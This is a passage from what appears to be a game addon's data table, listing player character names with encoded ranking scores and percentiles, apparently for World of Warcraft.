["Andrewr"] = "ST:693/99%LB:762/97%EM:561/93%",
["Afrodite"] = "ET:717/92%EB:713/90%EM:810/86%",
["Steth"] = "ST:723/99%LB:718/98%LM:847/97%",
["Wølfee"] = "RT:502/70%EB:692/87%EM:846/87%",
["Issaded"] = "LT:753/96%EB:742/94%EM:898/94%",
["Bakha"] = "ST:799/99%SB:816/99%SM:970/99%",
["Swingingdiik"] = "ET:550/75%EB:715/91%EM:679/75%",
["Sarelor"] = "LT:638/98%LB:720/98%LM:802/96%",
["Kareñ"] = "ET:609/81%EB:720/91%EM:605/88%",
["Loomf"] = "RT:313/54%EB:679/86%RM:485/69%",
["Xelaio"] = "LT:753/96%LB:782/98%LM:960/97%",
["Vyrus"] = "ST:794/99%SB:808/99%LM:894/96%",
["Lostmyjob"] = "ET:649/85%EB:731/92%EM:660/91%",
["Gfk"] = "EB:684/87%EM:864/90%",
["Shandrys"] = "LT:447/95%EB:735/92%EM:907/90%",
["Cpp"] = "ET:723/93%EB:751/94%EM:914/93%",
["Alirie"] = "ET:608/79%LB:635/95%EM:898/91%",
["Kipna"] = "RT:207/70%EB:714/90%EM:836/87%",
["Murdah"] = "ET:358/90%EB:721/91%LM:960/97%",
["Sandi"] = "ET:601/81%EB:701/89%EM:769/81%",
["Latenight"] = "CT:88/11%EB:745/93%LM:943/95%",
["Udeni"] = "LT:581/97%LB:671/96%EM:770/80%",
["Guccibalboa"] = "ET:718/92%LB:700/97%EM:757/94%",
["Flameheart"] = "ET:716/92%LB:754/95%EM:897/93%",
["Aßyss"] = "LT:778/98%SB:768/99%LM:876/98%",
["Rxd"] = "ET:681/88%LB:679/97%LM:790/95%",
["Sweatypaws"] = "ET:627/83%LB:759/95%LM:963/97%",
["Crimsonghost"] = "ET:432/94%LB:698/97%LM:899/98%",
["Wangflurry"] = "ST:781/99%SB:856/99%SM:1001/99%",
["Dreaming"] = "ST:792/99%SB:820/99%LM:964/98%",
["Cada"] = "LT:746/95%SB:762/99%LM:972/98%",
["Caveatemptor"] = "ET:301/85%EB:699/89%EM:884/90%",
["Beeslayer"] = "ET:738/94%EB:735/93%EM:886/91%",
["Areuawizard"] = "UT:104/40%LB:777/98%EM:921/94%",
["Soiz"] = "UT:164/34%LB:797/98%LM:969/98%",
["Alonewarrior"] = "RT:222/73%LB:642/95%EM:908/93%",
["Whaonelly"] = "ET:583/78%EB:618/94%EM:811/84%",
["Giggleslash"] = "ET:403/93%EB:733/93%LM:870/97%",
["Skulkraken"] = "ET:706/91%EB:592/93%EM:362/83%",
["Nobody"] = "ET:640/83%EB:721/91%EM:904/92%",
["Quya"] = "ST:808/99%SB:780/99%SM:994/99%",
["Chipewa"] = "ET:280/76%EB:605/85%EM:709/78%",
["Yeetj"] = "ET:700/85%EB:700/93%EM:795/87%",
["Healdatâss"] = "RT:508/64%EB:440/85%EM:800/89%",
["Ferngully"] = "LT:599/97%LB:725/96%EM:882/93%",
["Stackdaddy"] = "ET:318/80%EB:573/94%EM:871/91%",
["Shockinlybad"] = "LT:583/97%LB:782/98%LM:960/98%",
["Ritual"] = "RT:238/68%EB:639/88%RM:525/58%",
["Ralloo"] = "ET:762/92%LB:629/97%EM:796/86%",
["Akallius"] = "ET:689/85%EB:642/89%EM:743/81%",
["Thecower"] = "RT:523/66%EB:563/80%RM:435/51%",
["Viragzo"] = "ET:752/92%LB:724/96%LM:815/97%",
["Raccoonmorph"] = "RT:175/58%EB:650/89%EM:732/80%",
["Rockshox"] = "LT:562/96%LB:745/96%EM:907/94%",
["Smyte"] = "RT:552/71%UB:331/46%EM:816/91%",
["Whitecow"] = "LT:491/95%EB:676/92%EM:876/92%",
["Nospirit"] = "EB:494/90%UM:443/48%",
["Scrubbin"] = "RT:187/57%LB:717/95%LM:904/95%",
["Priestynips"] = "LT:497/95%EB:680/92%RM:565/63%",
["Yunlin"] = "RT:489/62%EB:625/86%EM:752/82%",
["Holyjoans"] = "LT:769/98%LB:744/96%EM:857/94%",
["Spiritualize"] = "ET:278/75%EB:414/83%EM:806/87%",
["Mootrocity"] = "RT:593/74%LB:750/96%EM:841/89%",
["Twìstedheals"] = "RT:404/52%EB:547/79%EM:466/81%",
["Jiaozi"] = "RB:407/58%EM:740/81%",
["Deadndivine"] = "ET:455/93%EB:488/90%LM:810/97%",
["Catleylolahu"] = "ET:776/93%EB:675/93%EM:792/89%",
["Evilyn"] = "RT:218/64%EB:622/87%EM:606/90%",
["Vingilot"] = "EB:615/86%RM:615/70%",
["Unmilkable"] = "RT:568/72%EB:667/89%EM:907/94%",
["Jugga"] = "ET:284/75%EB:461/87%EM:700/79%",
["Crispywaffle"] = "EB:688/93%EM:849/91%",
["Radikus"] = "CT:138/15%EB:518/75%UM:298/34%",
["Kriis"] = "RT:423/55%RB:532/74%RM:678/74%",
["Dogdesb"] = "EB:513/92%EM:763/83%",
["Jagersturm"] = "CT:188/21%EB:536/76%EM:777/84%",
["Thorgriimm"] = "RT:566/72%EB:491/90%EM:578/88%",
["Holykilo"] = "RT:206/62%RB:470/68%EM:603/90%",
["Ferrimlight"] = "CT:196/23%RB:511/74%RM:633/74%",
["Cacbu"] = "LB:742/97%EM:900/94%",
["Bubblesx"] = "RB:260/61%CM:11/16%",
["Bajo"] = "UT:245/30%EB:527/76%EM:741/81%",
["Holiballz"] = "CT:202/24%EB:410/83%RM:483/56%",
["Stonefly"] = "RT:162/51%EB:630/85%EM:708/94%",
["Herpulies"] = "RT:547/69%EB:641/88%EM:834/88%",
["Plaguexd"] = "UT:342/41%RB:482/69%UM:312/36%",
["Kalaith"] = "LT:774/97%SB:779/99%SM:931/99%",
["Yandhi"] = "ST:747/99%SB:813/99%LM:957/98%",
["Wozard"] = "ET:706/93%SB:817/99%LM:946/97%",
["Gimmick"] = "LT:742/95%LB:779/97%LM:925/95%",
["Keepaway"] = "ST:793/99%SB:792/99%SM:979/99%",
["Meshuggahx"] = "ST:825/99%LB:790/98%LM:968/97%",
["Øneshøt"] = "ST:794/99%LB:745/98%EM:876/91%",
["Kithanaz"] = "LT:476/96%LB:770/98%LM:961/97%",
["Blackness"] = "ET:724/93%LB:771/97%LM:946/96%",
["Brandon"] = "ET:614/94%SB:852/99%SM:1207/99%",
["Kuhnstfahrt"] = "ET:278/83%EB:753/94%EM:855/88%",
["Xanaxcocaine"] = "LT:753/96%LB:753/95%EM:727/78%",
["Arcticfire"] = "LT:762/96%SB:802/99%SM:1028/99%",
["Babak"] = "LT:770/97%EB:708/90%EM:872/91%",
["Sneekymoose"] = "ST:737/99%LB:791/98%EM:904/93%",
["Parrymore"] = "ET:690/89%SB:761/99%EM:903/93%",
["Ben"] = "ST:828/99%SB:808/99%LM:973/98%",
["Rezn"] = "ST:792/99%SB:845/99%SM:1037/99%",
["Radicola"] = "LT:791/98%LB:782/98%LM:946/96%",
["Karaski"] = "ET:589/79%LB:761/96%LM:967/97%",
["Vlizzy"] = "ST:776/99%SB:800/99%SM:1021/99%",
["Panicraccoon"] = "LT:775/97%LB:782/98%LM:973/98%",
["Shunion"] = "ST:699/99%LB:775/97%LM:942/96%",
["Naroku"] = "LT:740/95%LB:759/96%EM:783/84%",
["Teerock"] = "LT:765/97%SB:722/99%LM:943/97%",
["Trekkz"] = "LT:748/96%EB:713/90%EM:857/88%",
["Triqsz"] = "ET:728/93%EB:509/88%EM:570/85%",
["Nydig"] = "ST:743/99%LB:774/97%LM:935/95%",
["Magedaddy"] = "ST:755/99%SB:834/99%LM:957/98%",
["Eljen"] = "LT:590/98%LB:669/98%EM:907/94%",
["Bulbasaurr"] = "LT:782/98%LB:761/96%EM:891/93%",
["Fowl"] = "LT:769/97%LB:784/98%SM:883/99%",
["Kennybunny"] = "LT:787/98%LB:759/96%LM:932/96%",
["Aro"] = "LT:782/98%SB:799/99%SM:992/99%",
["Mimihaobai"] = "ET:677/91%LB:678/98%LM:938/97%",
["Leb"] = "ET:739/94%LB:772/97%LM:975/98%",
["Katslee"] = "ET:732/93%LB:694/97%LM:949/96%",
["Feolock"] = "ET:733/94%SB:807/99%LM:989/98%",
["Radd"] = "ST:800/99%SB:800/99%LM:937/95%",
["Tinyballz"] = "ET:716/92%LB:778/97%LM:935/95%",
["Mseevee"] = "ET:693/90%EB:402/81%RM:515/56%",
["Overmindsky"] = "ET:728/93%EB:651/84%LM:928/95%",
["Rohias"] = "LT:785/98%SB:802/99%SM:1042/99%",
["Hafpint"] = "ST:795/99%SB:800/99%EM:560/90%",
["Maraberry"] = "ET:714/92%LB:765/98%EM:904/93%",
["Quality"] = "ET:717/92%EB:728/93%EM:918/94%",
["Rozo"] = "ST:802/99%LB:690/97%EM:648/91%",
["Brodeus"] = "LT:752/95%LB:757/95%EM:938/94%",
["Piaros"] = "ET:706/91%LB:727/95%EM:411/78%",
["Dasfoxx"] = "ET:653/86%EB:648/88%RM:596/72%",
["Smitherz"] = "LT:752/95%EB:743/93%EM:796/83%",
["Eclipsers"] = "ET:715/92%EB:694/89%RM:598/64%",
["Aroc"] = "LT:760/96%LB:777/97%EM:916/94%",
["Tonycakes"] = "LT:669/98%SB:691/99%SM:1007/99%",
["Oldtree"] = "LT:784/98%LB:754/95%EM:901/92%",
["Iriemember"] = "ET:669/86%EB:535/89%RM:600/66%",
["Kuku"] = "LT:767/97%LB:778/97%LM:951/96%",
["Biubiubiun"] = "ET:705/91%LB:658/96%EM:718/76%",
["Ember"] = "ET:681/89%EB:681/91%EM:856/93%",
["Kairo"] = "LT:776/98%LB:774/97%LM:968/98%",
["Bowtems"] = "ST:824/99%SB:844/99%SM:1048/99%",
["Pandadada"] = "LT:805/95%EB:678/92%LM:909/95%",
["Cantare"] = "ET:738/89%EB:623/86%EM:700/94%",
["Handicapable"] = "RT:578/72%RB:278/65%EM:570/88%",
["Hopeofvilage"] = "RT:185/56%EB:411/82%RM:622/72%",
["Keylime"] = "LT:522/96%EB:628/87%EM:872/93%",
["Kiwiandapple"] = "ET:483/94%EB:579/82%EM:625/91%",
["Trapiz"] = "ET:375/88%EB:631/88%EM:829/89%",
["Geiger"] = "RT:535/68%EB:396/81%RM:358/71%",
["Xiaozaizi"] = "ET:652/92%SB:786/99%LM:954/98%",
["Olddrymom"] = "ET:301/79%RB:394/56%EM:713/82%",
["Zuluhed"] = "ET:703/86%EB:631/87%EM:723/94%",
["Vitaliknell"] = "ET:650/80%LB:602/96%EM:802/88%",
["Sampenguin"] = "ET:639/81%EB:465/88%EM:782/85%",
["Lowergi"] = "RT:444/56%EB:712/94%EM:851/90%",
["Kare"] = "ET:762/92%EB:688/93%EM:755/82%",
["Hatbitt"] = "ET:613/78%EB:567/80%UM:382/44%",
["Evilshady"] = "UT:346/44%EB:553/77%EM:721/79%",
["Dragarian"] = "ET:692/86%EB:551/94%LM:899/95%",
["Azurebreeze"] = "ET:258/75%EB:621/87%EM:785/85%",
["Battlewagons"] = "ET:663/83%EB:714/94%EM:841/89%",
["Hashsassin"] = "ET:441/92%EB:387/80%EM:782/83%",
["Lithin"] = "ET:368/87%RB:338/73%EM:601/89%",
["Jwowlol"] = "RT:479/64%EB:703/94%EM:869/92%",
["Kablam"] = "ET:699/89%EB:458/89%EM:862/91%",
["Xerosenki"] = "UT:394/49%RB:457/65%RM:573/63%",
["Resiststun"] = "RT:541/67%EB:585/82%EM:696/93%",
["Gilay"] = "RT:186/57%EB:613/85%EM:853/91%",
["Babiefat"] = "RT:204/61%EB:582/81%EM:822/89%",
["Johanna"] = "ET:612/78%LB:643/98%EM:903/94%",
["Chumae"] = "ET:445/93%EB:451/86%EM:593/89%",
["Hachiu"] = "UT:400/49%RB:259/54%RM:498/55%",
["Jinzo"] = "ET:398/89%EB:651/89%EM:741/77%",
["Dezolve"] = "RT:261/72%EB:676/91%CM:173/20%",
["Lumicat"] = "UT:94/30%EB:528/76%RM:484/53%",
["Burlatin"] = "ET:356/86%EB:605/85%EM:729/78%",
["Kirii"] = "ET:333/83%EB:625/88%EM:756/83%",
["Sonshine"] = "RT:207/64%EB:573/79%EM:423/78%",
["Slipper"] = "UT:295/36%RB:447/64%",
["Efgt"] = "ET:296/78%EB:617/85%EM:750/82%",
["Horcrux"] = "RT:247/70%EB:555/77%EM:812/88%",
["Defiler"] = "RT:521/66%RB:450/65%RM:503/59%",
["Littlebean"] = "RT:500/63%RB:249/58%EM:718/77%",
["Irreph"] = "RT:443/55%EB:561/78%EM:731/83%",
["Holyseto"] = "ET:612/78%EB:577/81%EM:659/75%",
["Marok"] = "ET:311/79%LB:745/96%EM:869/91%",
["Ezb"] = "ET:763/92%EB:714/94%LM:975/98%",
["Smice"] = "ET:764/92%LB:590/96%EM:705/94%",
["Ebru"] = "ET:775/93%LB:744/97%EM:914/94%",
["Eightys"] = "RT:254/71%EB:585/83%EM:714/82%",
["Jer"] = "ET:447/94%EB:446/87%LM:726/95%",
["Purity"] = "UT:288/37%LB:715/95%EM:785/85%",
["ßuttërs"] = "ET:299/81%RB:403/56%RM:450/52%",
["Kwell"] = "ET:413/91%EB:610/86%EM:859/94%",
["Nataji"] = "LT:504/95%EB:489/90%LM:718/95%",
["Vistal"] = "RT:201/62%LB:734/97%LM:942/97%",
["Hasbeen"] = "ET:630/80%EB:637/88%EM:826/90%",
["Varbosa"] = "ET:663/82%EB:562/94%EM:856/90%",
["Temek"] = "ET:426/92%EB:657/90%LM:863/98%",
["Rainseason"] = "ET:717/87%EB:656/89%RM:640/73%",
["Youn"] = "ET:343/87%EB:641/87%EM:848/90%",
["Chooz"] = "ET:601/77%EB:714/94%LM:939/96%",
["Ricflare"] = "ET:619/79%LB:776/98%LM:954/98%",
["Kimagreggs"] = "LT:873/98%EB:659/90%EM:752/84%",
["Crvcified"] = "LT:540/96%EB:505/90%EM:393/75%",
["Milkmommy"] = "RT:159/51%RB:525/73%RM:583/65%",
["Unidentify"] = "ET:691/89%LB:656/96%EM:924/94%",
["Yaminoshihai"] = "RT:169/59%LB:771/97%SM:1002/99%",
["Shedder"] = "ET:365/91%EB:696/89%EM:887/91%",
["Selcopa"] = "LT:767/97%SB:833/99%LM:958/98%",
["Iseeu"] = "ET:728/93%LB:715/98%LM:823/96%",
["Logicarn"] = "ET:700/90%SB:772/99%EM:760/79%",
["Chairtaker"] = "ET:386/94%LB:771/96%LM:950/96%",
["Littlebeebee"] = "ST:815/99%SB:840/99%SM:1030/99%",
["Siou"] = "ET:704/90%EB:740/93%LM:948/97%",
["Notslug"] = "LT:745/95%EB:736/93%EM:884/92%",
["Enf"] = "EB:689/88%EM:835/87%",
["Unbreakable"] = "ET:343/90%EB:688/87%EM:869/90%",
["Pufnstuff"] = "RT:565/74%LB:759/95%EM:915/93%",
["Blumpkinz"] = "ET:654/84%EB:714/91%EM:865/89%",
["Leikoz"] = "LT:765/97%SB:836/99%SM:1008/99%",
["Wtfmybffjill"] = "ST:800/99%SB:840/99%SM:928/99%",
["Johnscar"] = "ET:665/86%LB:634/95%EM:929/94%",
["Amonster"] = "ST:788/99%SB:782/99%SM:952/99%",
["Heval"] = "LT:769/97%EB:623/94%EM:900/92%",
["Zorkas"] = "ET:634/83%EB:734/92%EM:815/85%",
["Saltypopcorn"] = "ST:791/99%LB:783/98%LM:985/98%",
["Beers"] = "RT:519/68%EB:703/89%EM:867/89%",
["Saiyo"] = "ET:251/76%EB:673/86%UM:205/49%",
["Ravlin"] = "ET:682/88%EB:723/92%EM:714/92%",
["Akami"] = "LT:773/97%LB:795/98%LM:972/98%",
["Kittle"] = "ET:299/86%EB:707/89%EM:884/91%",
["Trichor"] = "LT:468/95%EB:708/90%EM:918/93%",
["Angrygingér"] = "RT:480/65%EB:539/90%EM:616/89%",
["Svenge"] = "RT:484/63%EB:730/92%EM:758/94%",
["Fayzarmy"] = "ET:717/91%EB:734/93%EM:894/92%",
["Boolah"] = "LT:425/95%EB:648/87%EM:931/93%",
["Gankstuh"] = "EB:656/84%EM:821/85%",
["Bbye"] = "RT:561/73%EB:735/93%EM:916/93%",
["Troylew"] = "ET:330/87%EB:723/92%EM:804/83%",
["Invisikray"] = "ET:725/92%LB:757/95%EM:894/92%",
["Ezkimo"] = "RT:217/72%EB:740/93%EM:895/92%",
["Rokhard"] = "RT:491/67%EB:712/89%LM:938/95%",
["Remulan"] = "RT:472/62%EB:724/92%LM:952/97%",
["Eviltrippin"] = "RT:507/69%EB:743/93%EM:721/76%",
["Rosekiier"] = "ET:735/93%LB:717/98%EM:746/79%",
["Ghostrunner"] = "ET:372/91%EB:740/93%EM:769/94%",
["Crumlicker"] = "LT:766/96%LB:717/98%LM:946/96%",
["Soysmasher"] = "ET:725/93%LB:767/96%EM:892/92%",
["Tormenting"] = "ET:692/89%SB:764/99%LM:955/97%",
["Lasthit"] = "LT:754/96%EB:713/90%EM:877/92%",
["Nynja"] = "LB:762/95%EM:908/92%",
["Istabzu"] = "RT:456/60%EB:659/85%EM:791/82%",
["Cyggles"] = "CT:26/9%EB:723/91%EM:590/87%",
["Slásh"] = "EB:705/89%EM:860/88%",
["Ayari"] = "LT:766/97%SB:765/99%LM:978/98%",
["Verenya"] = "ET:388/92%LB:758/95%EM:907/93%",
["Kekbot"] = "EB:641/81%EM:746/79%",
["Timmyspuds"] = "ET:664/87%EB:608/94%EM:722/79%",
["Wormbrain"] = "ET:297/84%EB:625/81%EM:918/93%",
["Lilwick"] = "ET:396/92%EB:697/88%EM:881/90%",
["Nascence"] = "LT:781/98%SB:821/99%LM:962/97%",
["Ausxx"] = "LT:550/97%EB:737/93%EM:508/80%",
["Gadan"] = "EB:707/89%EM:740/78%",
["Ream"] = "RT:225/74%EB:502/91%EM:664/91%",
["Sinus"] = "ST:792/99%SB:815/99%SM:968/99%",
["Bobfish"] = "LT:660/98%LB:755/95%EM:912/91%",
["Aype"] = "ST:768/99%LB:709/97%LM:888/98%",
["Norwoodfire"] = "ET:579/77%EB:546/90%RM:552/62%",
["Frozenwar"] = "RT:202/69%EB:703/89%EM:764/80%",
["Giio"] = "ET:674/88%EB:723/91%LM:785/95%",
["Shadymilkman"] = "ET:662/82%EB:676/90%EM:884/92%",
["Tompkinz"] = "RT:450/56%EB:460/87%UM:392/46%",
["Plu"] = "CT:132/14%EB:605/85%EM:745/81%",
["Chainpeels"] = "ET:354/85%EB:709/93%EM:903/93%",
["Mecheno"] = "RT:437/54%RB:448/64%UM:415/44%",
["Trees"] = "UT:157/48%EB:524/92%EM:867/94%",
["Stoof"] = "RT:468/59%EB:658/89%EM:824/88%",
["Allysyn"] = "LT:519/95%EB:618/85%EM:638/91%",
["Toxictotem"] = "RT:581/72%EB:662/89%EM:835/88%",
["Dedren"] = "ET:651/80%LB:637/97%EM:734/82%",
["Somewater"] = "ET:765/92%EB:702/93%LM:938/96%",
["Camir"] = "RT:268/73%LB:725/95%LM:966/98%",
["Pikaheals"] = "ET:734/89%LB:780/98%SM:983/99%",
["Essilyn"] = "RT:229/69%RB:334/71%UM:451/49%",
["Amerra"] = "EB:631/86%EM:884/93%",
["Physik"] = "RT:513/65%EB:662/91%RM:635/70%",
["Envishift"] = "ET:730/89%EB:690/93%EM:879/92%",
["Frist"] = "ET:679/83%EB:696/93%EM:905/94%",
["Slidin"] = "ET:356/85%EB:661/89%LM:952/97%",
["Shockala"] = "ET:329/82%EB:660/89%LM:924/95%",
["Pipipipipi"] = "UT:302/37%EB:651/90%EM:671/77%",
["Varler"] = "ET:306/80%EB:704/94%LM:959/98%",
["Seeley"] = "ET:263/75%EB:563/79%EM:884/93%",
["Chucknob"] = "RT:530/67%RB:514/74%EM:720/82%",
["Least"] = "EB:689/93%LM:932/97%",
["Kvöthè"] = "LT:578/97%EB:545/93%EM:632/91%",
["Grizzbruh"] = "EB:707/93%EM:688/78%",
["Dubyeh"] = "ET:399/89%EB:568/94%EM:883/92%",
["Eboniks"] = "ET:295/78%EB:609/84%EM:806/87%",
["Huffa"] = "RB:518/72%RM:647/72%",
["Foctdocto"] = "EB:587/81%EM:761/83%",
["Luxurious"] = "CT:30/1%EB:586/83%EM:822/89%",
["Dumbchill"] = "ET:297/77%EB:563/94%RM:265/61%",
["Bzariahh"] = "CT:85/8%EB:612/85%RM:345/70%",
["Overlaho"] = "RT:207/65%LB:608/96%EM:853/92%",
["Lycedra"] = "RT:194/58%EB:545/78%EM:703/77%",
["Kolameya"] = "RT:527/66%EB:430/85%EM:814/87%",
["Heysoos"] = "ST:746/99%EB:697/92%EM:880/92%",
["Parrot"] = "RB:487/71%EM:655/76%",
["Himadri"] = "ET:473/94%LB:718/95%EM:895/94%",
["Cans"] = "UT:285/36%EB:429/85%RM:589/69%",
["Hokuspex"] = "UT:350/46%LB:742/96%EM:900/94%",
["Aasuka"] = "EB:601/84%RM:551/63%",
["Schneeferton"] = "ET:636/80%EB:418/83%LM:738/95%",
["Archtyrael"] = "ET:651/81%EB:584/82%EM:850/89%",
["Zugs"] = "ET:309/80%EB:658/90%EM:662/92%",
["Phyzician"] = "CT:67/5%EB:624/87%EM:880/93%",
["Txcoshim"] = "EB:587/83%RM:593/69%",
["Vladteppes"] = "ET:290/85%EB:532/89%EM:620/79%",
["Lanaiyu"] = "ET:720/92%EB:713/90%LM:987/98%",
["Bluewater"] = "ET:692/89%EB:723/91%EM:827/85%",
["Icy"] = "LT:759/96%SB:712/99%LM:765/96%",
["Toughdaddi"] = "LT:777/98%SB:806/99%LM:951/96%",
["Baconator"] = "ST:795/99%SB:830/99%SM:1006/99%",
["Chibranjames"] = "ET:703/90%EB:725/91%LM:942/95%",
["Virstah"] = "ST:804/99%LB:785/98%LM:894/98%",
["Toxiif"] = "ET:616/82%EB:713/90%EM:811/87%",
["Danimalz"] = "ET:714/92%LB:748/96%LM:937/96%",
["Bst"] = "ET:717/92%LB:764/98%SM:913/99%",
["Tates"] = "LT:479/96%EB:709/94%EM:848/92%",
["Cz"] = "LT:773/97%LB:679/97%EM:902/92%",
["Hodey"] = "LT:753/96%SB:826/99%LM:987/98%",
["Isengaard"] = "LT:749/95%EB:500/90%EM:897/93%",
["Fallof"] = "LT:763/96%EB:698/92%EM:733/79%",
["Keni"] = "ST:796/99%SB:808/99%SM:997/99%",
["Akunookk"] = "ET:727/93%EB:643/83%EM:833/88%",
["Saregadon"] = "ET:660/86%LB:697/97%EM:927/94%",
["Xaint"] = "LT:764/97%LB:792/98%SM:984/99%",
["Kvaldir"] = "ST:688/99%LB:694/98%LM:959/97%",
["Koÿu"] = "ET:586/79%EB:745/94%SM:998/99%",
["Keanus"] = "ET:733/94%LB:786/98%LM:967/97%",
["Ohmybad"] = "ET:731/94%EB:716/94%EM:806/89%",
["Jslice"] = "ET:743/94%EB:648/84%LM:947/97%",
["Chinokafuu"] = "ET:739/94%SB:809/99%LM:975/98%",
["Bartenderr"] = "LT:757/96%SB:817/99%SM:898/99%",
["Damagingpath"] = "ST:691/99%EB:649/88%RM:531/65%",
["Sukbeefball"] = "LT:755/96%LB:773/98%EM:882/94%",
["Notsdubs"] = "ET:629/84%EB:701/88%RM:694/74%",
["Dect"] = "ST:793/99%LB:773/97%EM:878/91%",
["Sshhnnipah"] = "ST:836/99%SB:811/99%SM:1033/99%",
["Forcefed"] = "LT:756/96%LB:778/98%SM:1043/99%",
["Donis"] = "ET:734/94%EB:744/94%LM:949/96%",
["Narxis"] = "ET:695/91%LB:710/98%EM:902/94%",
["Salv"] = "LT:769/97%EB:710/90%LM:961/97%",
["Buffdaddi"] = "LT:747/95%LB:780/98%EM:767/83%",
["Zati"] = "ET:736/94%SB:812/99%LM:976/98%",
["Raynz"] = "ET:642/89%EB:662/83%EM:702/75%",
["Jsleazy"] = "ET:610/81%EB:701/88%EM:828/86%",
["Zrakkii"] = "ET:666/91%LB:752/95%EM:625/89%",
["Dap"] = "ST:804/99%EB:646/88%EM:815/90%",
["Ninefingerz"] = "LT:780/98%SB:768/99%LM:967/98%",
["Kriegerr"] = "ET:703/91%LB:753/96%EM:862/93%",
["Onefcuk"] = "ET:595/79%EB:426/80%EM:731/79%",
["Cacerdra"] = "ST:808/99%SB:834/99%LM:966/97%",
["Benzin"] = "ET:669/88%LB:758/96%EM:885/92%",
["Elyxm"] = "ET:695/90%EB:650/89%EM:857/87%",
["Ryanorc"] = "LT:754/96%LB:784/98%LM:965/97%",
["Pokerkid"] = "ST:806/99%SB:809/99%EM:913/94%",
["Fosters"] = "ET:727/93%EB:714/94%EM:806/86%",
["Oph"] = "ST:817/99%LB:783/98%LM:976/98%",
["Zubster"] = "LT:775/97%LB:758/95%LM:799/95%",
["Xeqt"] = "ET:719/92%EB:746/94%LM:922/95%",
["Killarney"] = "LT:751/95%LB:677/96%EM:775/81%",
["Jee"] = "ST:794/99%SB:790/99%SM:947/99%",
["Bitofajoo"] = "LT:748/95%LB:791/98%SM:1026/99%",
["Nariko"] = "ET:354/85%EB:675/90%EM:826/88%",
["Xersji"] = "RT:563/70%RB:307/70%RM:222/56%",
["Amerimutt"] = "RT:240/72%EB:605/83%EM:861/91%",
["Birria"] = "ET:337/83%EB:485/89%LM:751/95%",
["Adamhd"] = "ET:613/76%EB:351/76%EM:774/83%",
["Bokono"] = "UT:109/35%RB:499/69%RM:663/73%",
["Momoshu"] = "RT:235/67%EB:585/80%EM:751/82%",
["Squoosh"] = "RT:484/63%EB:525/75%EM:778/86%",
["Winterfressh"] = "LT:597/97%EB:480/89%EM:849/89%",
["Toastyhealz"] = "LT:525/96%RB:516/74%CM:114/12%",
["Basedruid"] = "ET:702/87%EB:530/76%EM:733/88%",
["Kd"] = "UT:278/35%RB:466/74%EM:700/84%",
["Jamek"] = "RT:199/63%EB:658/90%EM:859/93%",
["Iamacow"] = "RT:506/68%EB:526/76%EM:803/89%",
["Deftpaw"] = "LT:820/96%LB:754/97%EM:877/92%",
["Missindi"] = "RT:193/60%RB:487/67%EM:735/81%",
["Zepia"] = "RT:249/71%EB:621/86%EM:775/85%",
["Holywarpig"] = "RT:539/69%EB:548/93%EM:721/81%",
["Nymphe"] = "RT:412/54%RB:509/71%RM:322/68%",
["Engray"] = "RT:199/64%EB:575/82%RM:591/65%",
["Powersister"] = "RT:396/52%EB:566/79%RM:662/73%",
["Papsmyster"] = "ET:391/90%LB:725/95%LM:887/95%",
["Cheesewheel"] = "LT:686/98%LB:606/96%EM:895/93%",
["Lyt"] = "RT:553/72%EB:577/80%EM:781/84%",
["Nizzikef"] = "ET:773/92%EB:433/85%EM:832/87%",
["Euphie"] = "RT:462/58%EB:532/76%EM:828/92%",
["Sterman"] = "RT:269/74%RB:509/71%EM:652/86%",
["Biblia"] = "UT:329/42%RB:450/65%EM:761/81%",
["Bieto"] = "RT:525/66%RB:514/74%RM:625/73%",
["Bristana"] = "UT:222/27%RB:357/51%UM:375/40%",
["Healingpants"] = "LT:542/97%EB:565/81%RM:490/54%",
["Gkf"] = "ET:598/79%EB:664/93%LM:930/97%",
["Dungeonreset"] = "ET:275/75%EB:630/88%UM:353/42%",
["Overheals"] = "UT:391/49%EB:600/83%EM:757/83%",
["Friggsdotr"] = "UT:342/42%EB:575/81%EM:404/77%",
["Necrotize"] = "RT:349/72%EB:363/77%RM:493/71%",
["Couleurs"] = "LT:498/95%LB:634/97%EM:831/89%",
["Pansara"] = "RT:178/54%EB:641/88%EM:815/86%",
["Nyche"] = "LT:614/98%EB:535/93%EM:690/76%",
["Juliethecat"] = "RT:232/72%EB:664/90%EM:858/91%",
["Pcsh"] = "ET:649/81%EB:722/94%EM:842/91%",
["Danboard"] = "ET:677/83%EB:672/91%LM:897/95%",
["Feard"] = "RT:398/50%EB:357/76%RM:371/72%",
["Onyfanz"] = "RT:404/51%UB:318/43%EM:705/79%",
["Cantor"] = "ET:363/86%EB:607/84%EM:704/94%",
["Rootzilla"] = "LT:596/97%LB:651/98%LM:798/97%",
["Amartine"] = "UT:106/34%RB:509/74%RM:369/73%",
["Seiresleets"] = "RT:435/55%RB:493/70%EM:767/85%",
["Shadouken"] = "RT:258/72%RB:499/72%EM:836/88%",
["Keeheeheehee"] = "RT:513/66%EB:595/83%EM:740/83%",
["Juiceqt"] = "UT:133/45%UB:329/45%CM:127/10%",
["Niaoshouowo"] = "ET:341/87%EB:579/82%RM:483/53%",
["Yijay"] = "UT:310/38%EB:425/85%EM:720/84%",
["Totemplug"] = "RT:201/60%EB:590/83%EM:805/86%",
["Appa"] = "ST:675/99%EB:702/93%LM:917/95%",
["Wheatpasta"] = "UT:243/29%LB:715/95%EM:862/91%",
["Swellyy"] = "ET:738/90%EB:595/84%EM:512/75%",
["Rugdoctor"] = "ET:376/88%RB:322/71%EM:573/76%",
["Oritsuru"] = "UT:247/31%UB:170/42%RM:539/63%",
["Saajae"] = "ET:281/77%RB:478/66%RM:663/73%",
["Sorakaa"] = "RT:497/64%RB:470/68%RM:417/65%",
["Firz"] = "ET:473/94%EB:492/90%EM:668/93%",
["Belynix"] = "UT:87/27%EB:571/79%LM:899/95%",
["Rittz"] = "ET:322/82%EB:611/85%EM:700/79%",
["Gothebest"] = "ET:744/90%EB:696/93%EM:734/82%",
["Mizd"] = "ET:284/76%RB:528/73%EM:707/78%",
["Dulay"] = "ET:643/81%LB:580/95%EM:885/94%",
["Theriplay"] = "RT:222/71%EB:694/88%EM:826/85%",
["Cyrene"] = "ET:737/94%SB:823/99%LM:960/97%",
["Sila"] = "ET:700/90%EB:725/92%EM:833/86%",
["Dotgif"] = "ET:410/94%LB:766/96%SM:925/99%",
["Easymoney"] = "ET:712/93%EB:719/93%EM:886/94%",
["Windwing"] = "LT:761/96%EB:576/92%EM:793/85%",
["Silverknight"] = "LT:562/97%EB:741/93%EM:615/89%",
["Rackner"] = "ST:713/99%LB:638/95%EM:882/91%",
["Noize"] = "LT:790/98%LB:737/98%EM:909/94%",
["Whiskeydrunk"] = "LT:602/98%SB:750/99%LM:884/98%",
